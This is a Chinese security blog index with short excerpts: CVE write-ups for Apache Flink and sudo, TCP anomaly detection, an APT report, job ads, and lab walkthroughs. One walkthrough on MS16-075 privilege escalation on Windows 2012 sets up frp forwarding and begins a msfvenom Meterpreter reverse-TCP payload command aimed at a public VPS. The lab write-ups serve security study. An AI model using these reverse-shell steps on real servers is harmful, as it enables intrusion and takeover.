14x security Team

展开菜单

关于代码安全审计,你知道多少?

关于代码安全审计,你知道多少?
关于代码安全审计,你知道多少?随着互联网技术发展的越来越成熟,全球企业乃至政府都依靠互联网来实行基建,互联网固然便利,但却有很多潜在的威胁,一旦病毒或黑客侵入,电脑里储存的信息资料将功亏一篑,甚至出现财产损失,因此互联网安全发布防御必须提上日程。想要有效抵御计算机病毒入侵,或预先知晓计算机里存在的隐患,代码安全审计是怎么也绕不开的一项手段。代码审计是一项可以测试计算机的技术,同时也是一种核查手段,只不过对象是代码,主要用来检查计算机源代码中的安全缺陷,排查是否存在代码不规范或...

Apache Flink (文件写入漏洞和文件读取漏洞​)CVE-2020-17518&&CVE-2020-17519

Apache Flink (文件写入漏洞和文件读取漏洞​)CVE-2020-17518&&CVE-2020-17519
Apache Flink (文件写入漏洞和文件读取漏洞)CVE-2020-17518&&CVE-2020-17519一、漏洞描述Apache Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历。CVE-2020-17518: 文件写入漏洞攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任...

tcp异常报文攻击检测

tcp异常报文攻击检测
tcp异常报文攻击检测TCP报文标志位包括:URGACKPSHRSTSYNFIN攻击者通过发送非法TCP flag组合的报文对主机造成危害。检测异常检查TCP报文的各个标志位URG、ACK、PSH、RST、SYN、FIN,如果标志位异常,则认为是TCP异常报文。内置规则将所有TCP异常报文全部丢弃,记录攻击日志。异常检测如下:Syn option字段不完整(syn-64)6个标志位全为1。6个标志位全为0。SYN和FIN位同时为1。SYN和RST位同时为1。FIN和RST位同...

长城汽车车联网安全团队招聘

长城汽车车联网安全团队招聘
长城汽车车联网安全团队招聘公司简介长城汽车是成立于1984年的中国汽车品牌,总部位于河北省保定市,主要生产皮卡、SUV、轿车及新能源汽车等车型。长城汽车是中国首家在香港H股上市的民营整车汽车企业、国内规模最大的皮卡SUV专业厂、跨国公司。公司下属控股子公司40余家,员工7万多人,拥有4个整车生产基地(皮卡、SUV、CUV、轿车MPV)。具备发动机、前后桥、变速箱等核心零部件自主生产与配套能力。 2019年12月18日,人民日报“中国品牌发展指数”100榜单排名第60位...

蚂蚁金融云诚招安全专家

蚂蚁金融云诚招安全专家
蚂蚁金融云诚招安全专家公司简介蚂蚁集团是中国最大的移动支付平台支付宝的母公司,也是全球领先的金融科技开放平台,致力于以科技推动包括金融服务业在内的全球现代服务业的数字化升级,携手合作伙伴为消费者和小微企业提供普惠、绿色、可持续的服务,为世界带来微小而美好的改变。岗位名称:安全专家岗位职责:1.负责蚂蚁金融云以及OB的安全需求评审,安全测试;2.负责蚂蚁金融云以及OB 安全监控部署;3.负责金融云和OB安全监控与运营,应急响应;任职要求(专业能力要求满足一项即可):专业能力要求...

APT追踪:当黑客不讲武德,安全专家也容易被骗

APT追踪:当黑客不讲武德,安全专家也容易被骗
APT追踪:当黑客不讲武德,安全专家也容易被骗事件影响26日,谷歌威胁分析小组披露了一系列来自东北亚某国黑客组织的针对安全研究人员(尤其是漏洞研究人员)的攻击活动。攻击者使用疑似Lazarus APT组织的攻击基础设施,结合非常具有迷惑性的社工操作,骗取受害者信任,并可能以盗取安全公司电脑上的高价值漏洞研究资料达到攻击目的。目前国内已有一定数量的安全研究人员受到这个组织的欺骗,其研究电脑的敏感信息泄露。技巧攻击攻击者为了与安全研究者建立互信并保持联系,首先会在一些社交...

CentOS升级sudo版本,解决Sudo权限绕过漏洞 修复堆缓冲区溢出漏洞(CVE-2021- 3156)

CentOS升级sudo版本,解决Sudo权限绕过漏洞 修复堆缓冲区溢出漏洞(CVE-2021- 3156)
CentOS升级sudo版本,解决Sudo权限绕过漏洞 修复堆缓冲区溢出漏洞(CVE-2021- 3156)漏洞介绍关于 Sudo 堆缓冲区溢出漏洞(CVE-2021- 3156)的预警通知有关情报显示,sudo 存在缓冲区溢出漏洞。攻击者在取得服 务器基础权限的情况下,可以利用 sudo 基于堆的缓冲区溢出漏 洞,获得 root 权限。在 sudo 解析命令行参数的方式中发现了基 于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudo er 和非 sudoer...

记一次靶机漏洞的getshell逻辑代码分析过程

记一次靶机漏洞的getshell逻辑代码分析过程
记一次靶机漏洞的getshell逻辑代码分析过程首先是parmas变量类型函数,指向useraccount,实际上看到JcResetPass_checkSafeInfo.action是用来校验的地址那么实际上,我们只需要看这里,初始化变量type,如果data的结果为空,var _processing = false; var type = "0"; var submitType;  function change(type){  if...

记一次ms16075邪恶土豆提权windows2012服务器过程

记一次ms16075邪恶土豆提权windows2012服务器过程
记一次ms16075邪恶土豆提权windows2012服务器过程匿名权限2012服务器服务器系统是window2012的需要准备一台vps公网服务器,和一台kali虚拟机进行映射通信kali设置frp代理规则server填写公网服务器IP然后在在VPS启动frpKali转发6666到公网的1234端口配合MSF进行反弹开启kali的frp由MSF生成木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网ip LPORT=6...

old Team getshell上传工具

old Team getshell上传工具
old Team getshell上传工具,实现单个上传exp,和自动上传post功能漏洞由old Team发现的通用getshell漏洞,为了方便,写个工具测试...